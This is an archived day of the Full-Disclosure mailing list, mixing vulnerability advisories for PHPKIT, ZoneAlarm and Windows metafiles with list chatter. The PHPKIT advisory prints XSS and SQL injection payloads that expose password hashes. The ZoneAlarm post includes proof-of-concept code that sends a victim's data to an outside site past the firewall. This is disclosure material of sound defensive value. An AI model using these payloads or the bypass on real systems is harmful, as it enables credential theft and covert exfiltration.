[Full-disclosure] Advisory 21/2005: Multiple vulnerabilities in PHPKIT

2005-11-08 Thread Christopher Kunz

Hardened PHP Project
www.hardened-php.net

                 -= Security Advisory =-


      Advisory: Multiple vulnerabilities in PHPKIT
  Release Date: 2005/11/07
 Last Modified: 2005/11/04
        Author: Christopher Kunz [EMAIL PROTECTED]
   Application: PHPKIT 1.6.1 R2 and prior
      Severity: Cross-Site Scripting, SQL injection and information
                disclosure, password hash disclosure, local file
                disclosure, arbitrary code execution
          Risk: High / Critical (depending on server configuration)
 Vendor Status: No fix available
    References: http://www.hardened-php.net/advisory_212005.80.html


Overview:

   PHPKIT [1] is a combined content management, homepage building and community
   software written in PHP. Although it is available as open source, it has
   to be licensed for any other than private use. PHPKIT has the usual features
   for that kind of product (content editing, forums, user management, etc.).
   Typically for content management and portal systems, there are multiple
   vulnerabilities in several places in the front- and backend. The install
   base for PHPKIT can only be estimated - Google shows about 25,000 results
   for the query "powered by phpkit" [2].
   Since we did not perform a full audit, there is no guarantee that the
   described vulnerabilities are the only ones in the product.


Details:

   1) XSS
  Although the PHPKIT team seems to have made an effort to mitigate attacks
  with cross-site scripting, this was only partially successful. We found
  a number of critical XSS holes that can be exploited by any third party
  to steal admin cookies, change HTML code, launch CSRF attacks and so on.

   1.1) login/profile.php and login/userinfo.php
Two fields in the profile settings - those for AIM and Yahoo! screen
names - are inserted into the database without any input validation.
Thus, an XSS attack can be performed that is launched on any user who
looks at the offending profile.
The same attack can be launched on an administrator viewing a profile
via the administrator back-end.

   1.2) admin/admin.php (with register_globals On)
Since the variable $site_body is not properly initialized, an attacker
can launch an XSS attack against the administrator login screen. This
attack can utilize DOM to steal the administrator's credentials in
cleartext as long as they have some kind of password safe function
in their browser. Since script code can be executed on load, all that
an attacker has to do is get the administrator to click on a
manipulated link.

   1.3) Referrer statistics
By launching a HTTP request with the Referer set to some script code,
e.g. <script>alert('foo')</script>, an attacker prompts this code to
be included in the administrative backend, and executed as soon as
an administrator views the referrer statistics. This comes in handy
since it is a quasi-anonymous way of obtaining the administrator's
session cookies.

   1.4) Forum
Although input filtering takes place in the subject and content of
forum postings, no such filtering is performed when constructing
the HTML title tag and the logo's img alt attribute - both contain
the thread subject in unfiltered HTML, and script code is executed
twice per page.

   1.5) imcenter.php
PHPKIT's own instant messaging system does not perform input validation
on the subject line, so any user can IM the admin and contain script
code in the subject.

   1.6) Guestbook
The Homepage input field in the guest book is not properly sanitized
and any guest (no logged-in users, because their home page is not
displayed by default) can enter script code. As usual, this is displayed
as soon as the guestbook is viewed.

   2) SQL Injection
  Same as above: Although many places inside the PHPKIT software are not
  prone to SQL injection, some are. This leads to information disclosure
  and possibly deletion of arbitrary data in the database.

   2.1) SQL injection in profile pages (with magic_quotes_gpc Off)
Using a simple injection, any user of the PHPKIT-powered web site can
disclose the administrator's password hash. This is done via the $id
parameter in login/userinfo.php which is not properly sanitized. With
a crafted UNION statement, the attacker can obtain arbitrary data,
including but not limited to any user's password hash. A simple cast into
an int would have prevented this problem.
Example: include.php?path=login/userinfo.phpid='%20UNION%20SELECT%201,
1,user_pw,1,1,1,1,1,1,1,1,1,1,1,1,user_pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1,

Re: [Full-disclosure] Re: readdir_r considered harmful

2005-11-08 Thread Casper . Dik

In practice, you're correct. In theory, however, consider the
following code path.


 THREAD 1                       THREAD 2
 --------                       --------
 DIR *d1 = opendir(dir1);
                                DIR *d2 = opendir(dir2);
 dent1 = readdir(d1);
                                dent2 = readdir(d2);
 use(dent1);


In most implementations, dent1 != dent2. HOWEVER, there is no
guarantee that they will not both point to the same statically
allocated buffer, and some implementations may do so. For example,
this is why ctime_r exists: ctime returns a pointer to a statically
allocated buffer, and hence is not thread safe.

The standard actually guarantees that the static storage is
associated with the specific directory STREAM.  So a system on which
dent1 and dent2 point to the same buffer, and reads from one stream
affect the buffer returned by reads from another stream, is not
POSIX compliant.

See:

http://www.opengroup.org/onlinepubs/009695399/functions/readdir.html

The pointer returned by readdir() points to data which may be
overwritten by another call to readdir() on the same directory
stream. This data is not overwritten by another call to readdir()
on a different directory stream.

But it also goes on to say:

The readdir() function need not be reentrant. A function that is
not required to be reentrant is not required to be thread-safe.

which is the one thing I'd like POSIX to fix for thread safe implementations.

Casper
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
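Added example, not code from the thread: the interleaved readdir() path quoted above, run deterministically (one thread, two DIR streams), next to the copy-out pattern that stands in for readdir_r. It assumes a writable /tmp and glibc's copyable struct dirent; all function names are constructed here.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Create a fresh directory under /tmp (assumed writable) holding n empty files
 * named <prefix>0 .. <prefix>(n-1); the path goes to out. Returns 0 or -1. */
int make_dir_with_files(int n, const char *prefix, char *out, size_t outlen)
{
    char tmpl[] = "/tmp/readdir-demo-XXXXXX";
    if (mkdtemp(tmpl) == NULL) return -1;
    for (int i = 0; i < n; i++) {
        char path[512];
        snprintf(path, sizeof path, "%s/%s%d", tmpl, prefix, i);
        int fd = open(path, O_CREAT | O_WRONLY | O_EXCL, 0600);
        if (fd < 0) return -1;
        close(fd);
    }
    snprintf(out, outlen, "%s", tmpl);
    return 0;
}

/* Next entry that is not "." or "..", or NULL at end of stream. */
static struct dirent *next_real(DIR *d)
{
    struct dirent *e;
    while ((e = readdir(d)) != NULL)
        if (strcmp(e->d_name, ".") != 0 && strcmp(e->d_name, "..") != 0)
            return e;
    return NULL;
}

/* The interleaving from the thread, in one thread so the order is fixed:
 *   dent1 = readdir(d1); dent2 = readdir(d2); use(dent1);
 * POSIX says the readdir() on d2 may not overwrite the entry returned for d1,
 * so dent1->d_name must read as before. Returns 1 if it does, 0 if clobbered, -1 on error. */
int interleaved_streams_ok(const char *dir1, const char *dir2)
{
    DIR *d1 = opendir(dir1), *d2 = opendir(dir2);
    int ok = -1;
    if (d1 && d2) {
        struct dirent *dent1 = next_real(d1);
        if (dent1) {
            char saved[256];
            snprintf(saved, sizeof saved, "%s", dent1->d_name);
            struct dirent *dent2 = next_real(d2);      /* read on the other stream */
            ok = (dent2 != NULL && strcmp(dent1->d_name, saved) == 0);
        }
    }
    if (d1) closedir(d1);
    if (d2) closedir(d2);
    return ok;
}

/* What readdir_r() was meant for, minus its buffer-sizing trouble: copy each
 * entry out of the stream's buffer before the next readdir() on that stream.
 * Assumes struct dirent is copyable, as on glibc (d_name is char[256]). Returns count or -1. */
int collect_entries(const char *dir, struct dirent *out, int cap)
{
    DIR *d = opendir(dir);
    if (!d) return -1;
    int n = 0;
    struct dirent *e;
    while (n < cap && (e = next_real(d)) != NULL)
        out[n++] = *e;
    closedir(d);
    return n;
}

/* Remove a directory created by make_dir_with_files(). Returns 0 or -1. */
int remove_dir_with_files(const char *dir)
{
    struct dirent ents[64];
    int n = collect_entries(dir, ents, 64);
    if (n < 0) return -1;
    for (int i = 0; i < n; i++) {
        char path[512];
        snprintf(path, sizeof path, "%s/%s", dir, ents[i].d_name);
        if (unlink(path) != 0) return -1;
    }
    return rmdir(dir);
}

int main(void)
{
    char a[64], b[64];
    if (make_dir_with_files(3, "a", a, sizeof a) || make_dir_with_files(5, "b", b, sizeof b)) return 1;
    printf("dent1 intact after readdir() on the other stream: %d\n", interleaved_streams_ok(a, b));
    return remove_dir_with_files(a) | remove_dir_with_files(b);
}
```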


[Full-disclosure] Re: [OTAnn] Feedback

2005-11-08 Thread Dave Korn

shenanigans wrote in 
news:[EMAIL PROTECTED]
 I was interested in getting feedback from current mail group users.

 We have mirrored your mail list in a new application that provides a more
 aggregated and safe environment which utilizes the power of broadband.

  Utilizes the power of broadband?  What a heap of marketing wankspeak!

 Roomity.com v 1.5 is a web 2.01 community webapp. Our newest version adds
 broadcast video and social networking such as favorite authors and an
 html editor.

 It's free to join and any feedback would be appreciated.

 S.

http://Full_Disclosure_Security_Discussion_List.roomity.com/ says:
quote
 Your Firefox browser may not be set up correctly or it may need the 
required plugin. Please click support to configure your browser or find out 
what browsers we support and how.Support Page. If support page is not 
helpful please contact us
end quote

  So I go look at the support page, and it's full of download this, run 
that, allow the other to install, open holes in your firewall, all in order 
to allow what it persists in describing as your broadband webapp.  As if 
the app is in someway related to the kind of cable that carries the traffic.

  Sorry, no way on earth am I gonna run your wretched java virus/trojan just 
in order to get the opportunity to have marketing bullshit rammed down my 
throat.  It's utter GARBAGE to claim that installing some completely unknown 
java application is somehow a safe environment compared to reading plain 
text emails.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 





Re: [Full-disclosure] [OTAnn] Feedback

2005-11-08 Thread Michael Holstein

It's free to join and any feedback would be appreciated.


You might have had more luck posting it to vulnerable-idiots list 
rather than a security related one. Nobody's going to run your untrusted 
Java app and open their firewall.


Better bet we'll download it and pick it apart though. Hope for your 
sake you secured your side better than you wrote this app.


And BTW : I like the text based FD digests just fine.

~Mike.

PS: anyone notice this one :

Windows is the operating system on 98% of all PC's



RE: [Full-disclosure] [OTAnn] Feedback

2005-11-08 Thread Todd Towles
 
Mike said:
 You might have had more luck posting it to 
 vulnerable-idiots list rather than a security related one. 
 Nobody's going to run your untrusted Java app and open their firewall.
 
 Better bet we'll download it and pick it apart though. Hope 
 for your sake you secured your side better than you wrote this app.
 
 And BTW : I like the text based FD digests just fine.

Mike, you don't want to get the filtered e-mail list with a lot of ads?
Can't believe you are going to pass that up. Why would you mirror FD on
a safe app anyways...does he not see all the exploits and malware that
is exposed on this list. Why give it to people that don't understand it?

-Todd


Re: [Full-disclosure] Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability

2005-11-08 Thread Bipin Gautam
Debasis,
i'll see the POC; but seems like finally you did it... after our last
discussion i was trying to kick some nasm code to do the same. good
finding!




On 11/8/05, Debasis Mohanty [EMAIL PROTECTED] wrote:
 Zone Labs Products Advance Program Control and OS Firewall (Behavioral
 Based) Technology Bypass Vulnerability


 I.  PRODUCT BACKGROUND
 ZoneAlarm Pro and Internet Security Suite, with a new level of protection
 that Zone Labs calls an "OS Firewall" based on behavior-based analysis,
 have gone beyond network level protection and protect PCs against various
 local attacks on a Windows machine. Currently available personal firewalls
 protect PCs against only network based attacks; however, the new Zone Labs
 OS firewall technology monitors activity at the kernel level and prevents
 attacks at various levels. The new approach alerts the user by closely
 monitoring at kernel level for any unusual activity in the system, like
 changes in critical registry keys, changes in start-up entries, any kind of
 interprocess interaction and processes making outbound connections via
 other trusted programs. When ZoneAlarm sees unusual activity between
 applications, it can put the kibosh on memory being read, or quash
 unauthorized driver and service loading. The PoC below discusses how the
 ZoneAlarm Advance Program Control and Behavior Based Technology can be
 defeated by using an HTML Modal Dialog Box.

 II. TECHNICAL DESCRIPTION
 Zone Alarm products with Advance Program Control or OS Firewall Technology
 enabled detect and block almost all of the APIs (like Shell,
 ShellExecuteEx, SetWindowText, SetDlgItem etc.) which are commonly used by
 malicious programs to send data via http by piggybacking over other trusted
 programs. However, it is still possible for a malicious program (Trojans or
 worms etc.) to make outbound connections to the evil site by piggybacking
 over a trusted Internet browser using an HTML Modal Dialog in conjunction
 with simple JavaScript. Here it is assumed that the default browser (IE or
 Firefox etc.) has authorization to access the internet. In the case of the
 default installation of ZoneAlarm Pro, IE is by default allowed to access
 the internet. The PoC (Proof-of-Concept) in Section V explains the hack and
 the exploit code is also included for reference.

 III. IMPACT
 On successful exploitation the malicious program will be able to send the
 victim's details and personal system information to the attacker and this
 can further lead to complete system compromise.

 IV. AFFECTED PRODUCTS
 Zone Alarm Pro 6.0.x
 Zone Alarm Internet Security Suite 6.0.x
 Zone Alarm Firewall with Anti-Spyware 6.1.x
 Zone Alarm Firewall with Anti-Virus 6.0.x
 Zone Alarm Firewall (Free Version) 6.0.x


 V.  PROOF-OF-CONCEPT:
 By using the ShowHTMLDialog() method, it is possible for any malicious program
 to create a modal dialog box that displays HTML. This in turn can be used
 to redirect the page to the attacker's site. It is observed that using this
 method, ZA Pro and Internet Security Suite are unable to block internet
 access. This method can be used by any malicious program to send data
 outside via http to the attacker and at the same time it can also receive
 command instructions from the attacker. The detailed exploit code is
 given below:

  osfwbypass-demo.c 

 BOOL LoadHtmlDialog(void)
 {
     HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));

     if (hinstMSHTML)
     {
         SHOWHTMLDIALOGFN* pfnShowHTMLDialog;

         // Open a Modal Dialog box of HTML content type
         pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
                                                              "ShowHTMLDialog");

         if (pfnShowHTMLDialog)
         {
             IMoniker *pURLMoniker = NULL;

             // Invoke the html file containing the data to be sent via http
             BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
             CreateURLMoniker(NULL, bstrURL, &pURLMoniker);

             if (pURLMoniker)
             {
                 (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
                 pURLMoniker->Release();
             }

             SysFreeString(bstrURL);
         }

         FreeLibrary(hinstMSHTML);
     }

     return TRUE;
 }

  +++ 


  modal-dialog.htm 
 <html>
 <head>
 <meta http-equiv="Content-Language" content="en-us">
 <title>Redirection Dialog</title>

 <script language="JavaScript">

 // Here goes the information logged by the malicious program which will
 // be sent to the evil site via http request
 var sTargetURL =
     "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[Your Information Here]";
 window.location.href = sTargetURL;
 window.close();
 </script>

 </head>
 </html>
  +++ 

 VI. DEMONSTRATION:
 For a live demonstration, the compiled binary (osfwbypass-demo.exe) and
 the html redirection script (modal-dialog.htm) have been enclosed with this
 advisory. To test, kindly follow these steps:

 a.  Extract both osfwbypass-demo.exe and modal-dialog.htm to C:\.
 [Note: You can extract osfwbypass-demo.exe to whatever location you like
 but don't change the location of modal-dialog.htm other than C:\
 otherwise the PoC won't work.] - Just to save time, I had to 

[Full-disclosure] [EEYEB-20050901] Windows Metafile SetPalette Entries Heap Overflow Vulnerability (Graphics Rendering Engine Vulnerability)

2005-11-08 Thread Advisories
Windows Metafile SetPalette Entries Heap Overflow Vulnerability
(Graphics Rendering Engine Vulnerability)

Release Date:
November 8, 2005

Date Reported:
September 1, 2005

Severity:
High (Code Execution)

Vendor:
Microsoft

Systems Affected:
Windows 2000
Windows XP SP0, SP1
Windows Server 2003 SP0

Overview:
eEye Digital Security has discovered a vulnerability in the way the
Windows Graphical Device Interface (GDI) processes Windows Metafile
(WMF) format image files that would allow arbitrary code execution as a
user who attempts to view a malicious image.  An attacker could send
such a metafile to a victim of his choice over any of a variety of
attack vectors, including an HTML e-mail, a link to a web page, a
metafile-bearing Microsoft Office document, or a chat message.

Technical Details:
The code in GDI32.DLL responsible for rendering Windows Metafiles
contains an integer overflow vulnerability in the function
PlayMetaFileRecord, cases 36h and 37h, which handle
SetPaletteEntries-type records.  If the reported length of such a
record is 7FFFh or h, the following code will experience an
integer overflow and can be made to allocate an insufficient heap block,
the success of which incorrectly implies the validity of the length:

77F5BC38    mov     eax, [ebx]          ; length field
77F5BC3A    lea     eax, [eax+eax+2]    ; *** integer overflow ***
77F5BC3E    push    eax
77F5BC3F    push    edi
77F5BC40    call    ds:LocalAlloc
            ...
77F5BC51    mov     ecx, [ebx]          ; length field
77F5BC53    add     eax, 2
77F5BC56    shl     ecx, 1              ; copy size != allocation size
77F5BC58    mov     edx, ecx            ; intrinsic memcpy() follows
77F5BC5A    mov     esi, ebx
77F5BC5C    mov     edi, eax
77F5BC5E    shr     ecx, 2
77F5BC61    rep movsd
77F5BC63    mov     ecx, edx
77F5BC65    and     ecx, 3
            ...
77F5BC6D    rep movsb

Although the copy length is similarly subject to an integer overflow,
the two differ by a +2 term, and therefore the allocation size can be
made very small while keeping the copy length extremely large.  The
result is a complete heap overwrite with arbitrary binary data from the
metafile.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink Endpoint Protection proactively protects users from this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx

Credit:
Fang Xing

Related Links:
This vulnerability has been assigned the following IDs:

EEYEB-20050901
OSVDB ID: 
CVE ID: CAN-2005-2123

Greetings:
Thanks to Derek and the eEye guys for helping me write this advisory. Greetings
to the xfocus guys and the venustech lab guys.

Copyright (c) 1998-2005 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.


[Full-disclosure] [EEYEB-20050329] Windows Metafile Multiple Heap Overflows

2005-11-08 Thread Advisories
Windows Metafile Multiple Heap Overflows

Release Date:
November 8, 2005

Date Reported:
March 29, 2005

Severity:
High (Code Execution)

Vendor:
Microsoft

Systems Affected:
Windows 2000
Windows Server 2003

Overview:
eEye Digital Security has discovered a heap overflow vulnerability in
the way the Windows Graphical Device Interface (GDI) processes Windows
enhanced metafile images (file extensions EMF and WMF).  An attacker
could send a malicious metafile to a victim of his choice over any of a
variety of media -- such as HTML e-mail, a link to a web page, a
metafile-bearing Microsoft Office document, or a chat message -- in
order to execute code on that user's system at the user's privilege
level.

Technical Details:
The Windows metafile rendering code in GDI32.DLL contains a number of
integer overflow flaws in its processing of EMF/WMF file data that lead
to exploitable heap overflows through any number of specially crafted
metafile structures.  For example, the following disassembly from
MRBP16::bCheckRecord demonstrates a size calculation that is susceptible
to integer overflow and as a result may pass validation with a dangerous
value:

77F6C759    mov     edx, [ecx+18h]      ; malicious count (e.g., 800Dh)
77F6C75C    mov     eax, [ecx+4]        ; heap allocation size
            ...
77F6C764    lea     edx, [edx*4+1Ch]    ; EDX = 3FF9h: integer overflow
77F6C76B    cmp     edx, eax            ; validation check
77F6C76D    jnz     77F6C77F

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink Endpoint Protection proactively protects users from this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx

Credit:
Fang Xing

Related Links:
This vulnerability has been assigned the following IDs:

EEYEB-20050329
OSVDB ID: 18820
CVE ID: CAN-2005-2124

Greetings:
Thanks to Derek and the eEye guys for helping me write this advisory. Greetings
to the xfocus guys and the venustech lab guys.


Copyright (c) 1998-2005 eEye Digital Security Permission is hereby
granted for the redistribution of this alert electronically. It is not
to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium
excluding electronic medium, please email [EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
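Added example, not eEye's code and not the real WMF parser: the two size calculations from the disassembly in this advisory (count*4 + 1Ch in MRBP16::bCheckRecord) and in EEYEB-20050901 above (len*2 + 2 for SetPaletteEntries records), done in 32-bit arithmetic as the x86 code does, beside checked versions that fail closed on wraparound and a record consumer that sizes its copy from the same checked value that sized the buffer. The 4-byte little-endian length header, the test values and the function names are constructed for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* a*b + c computed for 32-bit consumers; false if the true result does not fit. */
bool mul_add_u32(uint32_t a, uint32_t b, uint32_t c, uint32_t *out)
{
    uint64_t r = (uint64_t)a * b + c;
    if (r > UINT32_MAX) return false;
    *out = (uint32_t)r;
    return true;
}

/* SetPaletteEntries record (PlayMetaFileRecord cases 36h/37h):
 * allocation = len*2 + 2 ("lea eax, [eax+eax+2]"), copy = len*2 ("shl ecx, 1").
 * Unchecked, exactly as the 32-bit code computes them. */
uint32_t palette_alloc_size_unchecked(uint32_t len) { return len * 2u + 2u; }
uint32_t palette_copy_size(uint32_t len)            { return len * 2u; }

/* The +2 term is what lets the allocation wrap to a tiny value while the copy
 * length stays huge; this reports whether the allocation still covers the copy. */
bool palette_alloc_covers_copy(uint32_t len)
{
    return palette_alloc_size_unchecked(len) >= palette_copy_size(len);
}

/* Checked version: refuses any length whose size computation would wrap. */
bool palette_alloc_size_checked(uint32_t len, uint32_t *out)
{
    return mul_add_u32(len, 2u, 2u, out);
}

/* MRBP16::bCheckRecord: the record passes when count*4 + 1Ch equals the size
 * of the heap block it sits in ("lea edx, [edx*4+1Ch]; cmp edx, eax"). */
bool bcheckrecord_unchecked(uint32_t count, uint32_t cb_alloc)
{
    return count * 4u + 0x1Cu == cb_alloc;
}

/* Checked: a count whose calculation wraps can never validate. */
bool bcheckrecord_checked(uint32_t count, uint32_t cb_alloc)
{
    uint32_t need;
    return mul_add_u32(count, 4u, 0x1Cu, &need) && need == cb_alloc;
}

/* Constructed record consumer: 4-byte little-endian length (host order assumed),
 * then the palette bytes. The copy is bounded by the checked allocation size
 * and by the bytes actually present, never by the header alone. */
bool play_palette_record(const uint8_t *rec, size_t rec_len, uint8_t *dst, size_t dst_cap)
{
    if (rec_len < 4) return false;
    uint32_t len, need;
    memcpy(&len, rec, 4);
    if (!palette_alloc_size_checked(len, &need)) return false;
    if (need > dst_cap || (size_t)palette_copy_size(len) > rec_len - 4) return false;
    memcpy(dst, rec + 4, palette_copy_size(len));
    return true;
}

int main(void)
{
    /* Constructed inputs: a length that wraps the allocation, and a sane one. */
    uint32_t big = 0x7FFFFFFFu, small = 16u;
    printf("len=%08X alloc=%u copy=%u covers=%d\n", big, palette_alloc_size_unchecked(big),
           palette_copy_size(big), palette_alloc_covers_copy(big));
    printf("len=%u alloc=%u copy=%u covers=%d\n", small, palette_alloc_size_unchecked(small),
           palette_copy_size(small), palette_alloc_covers_copy(small));
    printf("bCheckRecord(count=40000005h, cb=30h): unchecked=%d checked=%d\n",
           bcheckrecord_unchecked(0x40000005u, 0x30u), bcheckrecord_checked(0x40000005u, 0x30u));
    return 0;
}
```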


[Full-disclosure] Re: Security Updates Without Rebooting

2005-11-08 Thread Tomasz Nidecki

Tuesday, November 8, 2005, 2:48:28 AM, Valdis wrote:

 Or, if you're able to identify I only applied an Apache patch, you may very
 well be able to only restart that one service.  For RedHat/Fedora systems,
 you'd do this with 'service httpd restart' (or replace httpd with the name
 of the /etc/init.d script that starts/stops the service in question). For
 other systems, you should be able to find a similar stop then restart for
 the specific daemon in question.

Well, if I could make a small suggestion, I never use the /etc/rc.d or
/etc/init.d scripts on my servers. I have long ago switched to
daemontools - http://cr.yp.to/daemontools.html [there are similar
solutions for those who don't like daemontools, e.g. a very similar one
called runit - http://smarden.org/runit/]. There are a couple of
security and ease-of-use reasons to do that:

* a service such as daemontools or runit will make sure your service
is running even if something causes it to fail temporarily, as it
monitors the service every second and restarts it if necessary

* for every service monitored all I need to do to restart it after
a security update is svc -t /service/servicename.

Obviously, RPMs will not restart such services, so this is a drawback,
but I find this a very good, platform-independent [e.g. some
distributions use the SysV scripts, some use other solutions] method
to control services that also makes sure for me that the service is
always running.

The drawback is the fact that not all services can be run in the
foreground [this is required for daemontools/runit] and that writing
your own run scripts might sometimes be difficult [but the runit page
contains a bunch of ready-made run scripts for most popular services].

- --
Tomasz Nidecki, Sekr. Redakcji / Managing Editor
hakin9 magazinehttp://www.hakin9.org
mailto:[EMAIL PROTECTED]  jid:[EMAIL PROTECTED]

Do you know what hacker means?
http://www.catb.org/~esr/faqs/hacker-howto.html

Do you know what the word hacker means?
http://www.jtz.org.pl/Inne/hacker-howto-pl.html





[Full-disclosure] Digg dot com

2005-11-08 Thread n3td3v
Hi security community,

Ground breaking research http://digg.com/security/Dugging_on_Digg ;-)

Think Myspace... get researching.

Thanks, n3td3v


RE: [Full-disclosure] Security Contact for Avast, Symantec and AvG please

2005-11-08 Thread ad
If I remember, for symantec there is also [EMAIL PROTECTED], cheers man ;)

-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On behalf of Thierry
Zoller
Sent: Tuesday, 8 November 2005 19:45
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Security Contact for Avast,Symantec and AvG please



If you care and you read this list get in touch with me.

AVG - No I will not send you my license number prior to doing research
  for you...
Symantec - twice at [EMAIL PROTECTED] should be enough no ?
Avast -

http://secdev.zoller.lu

-- 
Thierry Zoller




RE: [Full-disclosure] Security Contact for Avast, Symantec and AvG please

2005-11-08 Thread Juha-Matti Laurio

Yes, they list [EMAIL PROTECTED] as an official address:

 Responsible security researchers work with the Symantec Product 
Security team through the email address [EMAIL PROTECTED]

http://securityresponse.symantec.com/security/

- Juha-Matti


If I remember, for symantec there is also [EMAIL PROTECTED], cheers man ;)

-----Original Message-----
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On behalf of Thierry
Zoller
Sent: Tuesday, 8 November 2005 19:45
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Security Contact for Avast,Symantec and AvG please



If you care and you read this list get in touch with me.

AVG - No I will not send you my license number prior to doing research
  for you...
Symantec - twice at [EMAIL PROTECTED] should be enough no ?
Avast -

http://secdev.zoller.lu

--
Thierry Zoller




[Full-disclosure] MDKSA-2005:206 - Updated openvpn packages fix multiple vulnerabilities

2005-11-08 Thread Mandriva Security Team

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:206
 http://www.mandriva.com/security/
 ___
 
 Package : openvpn
 Date: November 8, 2005
 Affected: Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Two Denial of Service vulnerabilities exist in OpenVPN.  The first
 allows a malicious or compromised server to execute arbitrary code
 on the client (CVE-2005-3393).  The second DoS can occur when, in
 TCP server mode, OpenVPN receives an error on accept(2) and the
 resulting exception handler causes a segfault (CVE-2005-3409).
 
 The updated packages have been patched to correct these problems.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3393
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3409
 ___
 
 Updated Packages:
 
 Multi Network Firewall 2.0:
 6d05d03341ef7c99bd0c044ac14383c7  mnf/2.0/RPMS/openvpn-2.0.1-0.2.M20mdk.i586.rpm
 8882e7500e1fb8a255f5f50885042608  mnf/2.0/SRPMS/openvpn-2.0.1-0.2.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com


[Full-disclosure] suggest a small pentest distro

2005-11-08 Thread crazy frog crazy frog
Hi,
can anyone suggest a small pentest linux distro? smallest means (under
250 mb.), i saw one on the whax site. has anyone used it?
no google please
--
ting ding ting ding ting ding
ting ding ting ding ding
i m crazy frog :)
oh yeah oh yeah...
 another wannabe, in hackerland!!!


Re: [Full-disclosure] suggest a small pentest distro

2005-11-08 Thread John Smith

I like knoppix STD, it fits on a CD, but hasn't been updated in some time.

First hit on google for live linux cds

http://www.frozentech.com/content/livecd.php?pick=Allshowonly=security

I even narrowed it down to the security section for your lazy ass.

crazy frog crazy frog wrote:

Hi,
can anyone suggest a small pentest linux distro? smallest means (under
250 mb.), i saw one on the whax site. has anyone used it?
no google please
--
ting ding ting ding ting ding
ting ding ting ding ding
i m crazy frog :)
oh yeah oh yeah...
 another wannabe, in hackerland!!!


Re: [Full-disclosure] suggest a small pentest distro

2005-11-08 Thread Valdis . Kletnieks
On Wed, 09 Nov 2005 12:41:41 +0530, crazy frog crazy frog said:
 i know about all those distros auditor,phlak,whax etc but what i want
 is a distro whose size is much smaller among these distros.

So take one of those distros and heave stuff over the side until you get
it small enough. Note that there's only 2 constraints - the 650-700M that
will fit on a standard CD, and the 250M or so that you can fit onto one
of the credit card sized chopped-down CDs.

The distinction only matters if the pen test assumes that you can sneak
a cut-down CD onto the site, but can't find a way to get a regular CD onto
the site (if all else fails, buy a portable CD player, scribble "My Fave Metal"
on your pen-test disk, and see if you can social-engineer it past the guard).

If you're *really* good, you can even burn it so the CD player will see
3 or 4 good metal cuts, so you can crank it up and prove it's a music CD. ;)

